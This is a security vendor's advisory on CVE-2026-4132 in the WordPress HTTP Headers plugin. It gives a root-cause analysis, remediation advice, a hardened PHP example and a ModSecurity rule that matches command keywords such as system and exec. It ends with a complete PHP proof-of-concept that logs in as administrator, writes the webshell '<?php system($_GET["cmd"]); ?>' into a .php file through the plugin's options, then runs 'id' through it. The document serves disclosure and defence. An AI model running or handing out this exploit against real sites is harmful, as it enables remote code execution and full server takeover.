Atomic Edge analysis of CVE-2026-4132 (metadata-based): This vulnerability affects the HTTP Headers plugin for WordPress versions up to and including 1.19.2. It allows authenticated attackers with Administrator-level access to achieve Remote Code Execution by controlling the file path for an htpasswd file and injecting unsanitized content into that file. The CVSS score is 7.2 (High), with the vector indicating network-based attacks, low complexity, required administrator privileges, no user interaction, and impacts on confidentiality, integrity, and availability all rated as High.
The root cause is a combination of two flaws. First, the plugin stores the file path in the 'hh_htpasswd_path' option without sufficient validation, allowing an administrator to set an arbitrary path on the filesystem (CWE-73: External Control of File Name or Path). Second, the 'hh_www_authenticate_user' option, which supplies the username for HTTP Basic Authentication, is not sanitized before being written into the file. The apache_auth_credentials() function constructs the file content using sprintf('%s:{SHA}%s', $user, …) and update_auth_credentials() writes this via file_put_contents(). These conclusions are inferred from the vulnerability description and CWE classification, as no source code diff is available.
To exploit this, an attacker with Administrator credentials sends a POST request to the WordPress admin area (likely via the options or settings page for the plugin, or an AJAX handler) updating the 'hh_htpasswd_path' option to a path like /path/to/wordpress/wp-content/plugins/http-headers/evil.php and the 'hh_www_authenticate_user' option to a payload such as . The plugin then writes the unsanitized user value into the specified file, creating a PHP webshell. The attacker can then access the webshell via HTTP GET with arbitrary commands.
Remediation requires the plugin developer to: (1) strictly validate the 'hh_htpasswd_path' option to ensure it points to a safe, predetermined directory (e.g., within the WordPress uploads folder) and restrict the file extension to .htpasswd; (2) sanitize the 'hh_www_authenticate_user' value to remove any characters that could be interpreted as executable code (e.g., using WordPress's sanitize_text_field() and avoiding direct use in file writes); (3) avoid using file_put_contents() with user-controlled filenames and content without validation.
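A hardened version of the write path that applies the three remediation points above, as an added example and not the plugin's own code: the function names mirror those named in the analysis, while $allowed_dir, the fixed ".htpasswd" file name and the username allow-list are assumptions made here.

```php
<?php
// Added example (not the plugin's code): a hardened version of the update_auth_credentials() /
// apache_auth_credentials() pattern described above. Assumptions: the plugin may only write into
// $allowed_dir, the file must be named exactly ".htpasswd", and no WordPress helpers are used so
// the snippet runs with plain PHP.

// The path option must resolve to "<allowed_dir>/.htpasswd"; "..", symlinks and other names are rejected.
function validate_htpasswd_path(string $path, string $allowed_dir): ?string {
    if (basename($path) !== '.htpasswd') {
        return null;                      // blocks evil.php, shell.phtml, etc.
    }
    $base = realpath($allowed_dir);
    $dir  = realpath(dirname($path));     // the parent directory must already exist
    if ($base === false || $dir === false) {
        return null;
    }
    // Trailing separator keeps /var/www/uploads2 from passing as a child of /var/www/uploads
    if (strpos($dir . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $dir . DIRECTORY_SEPARATOR . '.htpasswd';
}

// htpasswd usernames must not contain ':' (field separator), whitespace or newlines;
// a short allow-list is simpler and safer than stripping dangerous characters.
function validate_htpasswd_user(string $user): ?string {
    return preg_match('/^[A-Za-z0-9._-]{1,64}$/', $user) === 1 ? $user : null;
}

// Builds the "user:{SHA}base64(sha1(password))" line the analysis describes, from validated input only.
function apache_auth_credentials_line(string $user, string $password): string {
    return sprintf("%s:{SHA}%s\n", $user, base64_encode(sha1($password, true)));
}

// Writes only when both options validate; otherwise returns false without touching the filesystem.
function update_auth_credentials(string $path_opt, string $user_opt, string $password, string $allowed_dir): bool {
    $path = validate_htpasswd_path($path_opt, $allowed_dir);
    $user = validate_htpasswd_user($user_opt);
    if ($path === null || $user === null) {
        return false;
    }
    return file_put_contents($path, apache_auth_credentials_line($user, $password), LOCK_EX) !== false;
}

// Constructed demo inputs: the advisory's attack shape is rejected, a legitimate pair is written.
$allowed = sys_get_temp_dir() . '/hh-demo';
@mkdir($allowed, 0700);
var_dump(update_auth_credentials($allowed . '/../evil.php', '<?php echo 1; ?>', 'pw', $allowed));
var_dump(update_auth_credentials($allowed . '/.htpasswd', 'alice', 'pw', $allowed));
```

Because the file name is fixed and the parent directory is resolved with realpath() before the containment check, neither the path nor the username option can steer the write to a PHP file or smuggle PHP tags into it.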
If exploited, this vulnerability allows an attacker with Administrator access to execute arbitrary PHP code on the server, potentially leading to full site compromise including data theft, malware injection, user account creation (including admin accounts), and server takeovers. The attack requires Administrator privileges, but it significantly increases the blast radius of a compromised administrator account.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-4132 (metadata-based)
# Block exploitation of file path control and unsanitized input in HTTP Headers plugin
# This rule targets the options.php endpoint where the vulnerable parameters are likely submitted
# REQUEST_FILENAME excludes the query string, so an appended "?x=1" cannot sidestep the match;
# the directive is continued with trailing backslashes because the actions span several lines
SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \
    "id:20264132,phase:2,deny,status:403,log,chain,\
    msg:'CVE-2026-4132 - HTTP Headers plugin RCE via hh_htpasswd_path and hh_www_authenticate_user',\
    severity:'CRITICAL',tag:'CVE-2026-4132'"
    # Chained: all three conditions must match. The '.' is escaped so 'xphp' does not match, and t:lowercase catches '.PHP'
    SecRule ARGS:hh_htpasswd_path "@rx \.php$" "t:none,t:urlDecode,t:lowercase,chain"
    # '<?php' needs the '?' escaped; unescaped, the pattern would match the bare string 'php'
    SecRule ARGS:hh_www_authenticate_user "@rx (?i:<\?php|eval|system|exec|popen|passthru|shell_exec|assert|base64_decode|die|exit)" "t:none,t:urlDecode,t:lowercase"
<?php
// (the opening tag must precede these comments, otherwise PHP would emit them as literal text)
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4132 - HTTP Headers <= 1.19.2 - Authenticated (Administrator+) External Control of File Name or Path to RCE via 'hh_htpasswd_path' and 'hh_www_authenticate_user' Parameters
// Configuration
$target_url = 'http://target-wordpress-site.com'; // Change this to the target WordPress URL
$admin_username = 'admin'; // Replace with WordPress admin username
$admin_password = 'password'; // Replace with WordPress admin password
// Step 1: Authenticate as admin
$login_url = $target_url . '/wp-login.php';
$cookies = '';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $admin_username,
    'pwd' => $admin_password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies_cve20264132.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
// Extract nonce from admin page for updating options (assumes plugin uses standard settings API)
$admin_dashboard = $target_url . '/wp-admin/options-general.php?page=http-headers';
curl_setopt($ch, CURLOPT_URL, $admin_dashboard);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$admin_page = curl_exec($ch);
// Attempt to extract _wpnonce from the settings form (the form may use a different field name; this is the common wp_nonce_field() pattern)
// '~' delimiters avoid the unescaped '/' that broke the original pattern, and wp_nonce_field() emits an id attribute before name, so only name/value are matched
preg_match('~name="_wpnonce" value="([^"]+)"~', $admin_page, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';
// Alternatively, the plugin may use an AJAX action. We try both approaches.
// Step 2 (Approach A): Standard settings update via admin-post or options update
// The plugin likely registers settings with register_setting() and uses a settings field.
// For demonstration, we POST directly to options.php with the vulnerable parameters.
$options_url = $target_url . '/wp-admin/options.php';
// The webshell payload
$payload = '<?php system($_GET["cmd"]); ?>';
// Set the file path to a writable location within the plugin's directory (or a web-accessible path)
$local_path = '/var/www/html/wp-content/plugins/http-headers/evil-' . uniqid() . '.php'; // Adapt to target filesystem
$webshell_path = $target_url . '/wp-content/plugins/http-headers/' . basename($local_path); // URL of the same file (single uniqid(), so both paths agree)
curl_setopt($ch, CURLOPT_URL, $options_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    '_wpnonce' => $nonce,
    'option_page' => 'http-headers',
    'hh_htpasswd_path' => $local_path,
    'hh_www_authenticate_user' => $payload
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
// Step 3: Verify the webshell was created by accessing it
// basename() reuses the file name chosen above; dirname() on a URL would strip the host and return 'http:'
$webshell_url = $target_url . '/wp-content/plugins/http-headers/' . basename($local_path) . '?cmd=id';
curl_setopt($ch, CURLOPT_URL, $webshell_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$result = curl_exec($ch);
echo "PoC complete. Attempted to create webshell at: $webshell_path\n";
echo "If successful, the response should contain the output of the 'id' command:\n$result\n";
curl_close($ch);
?>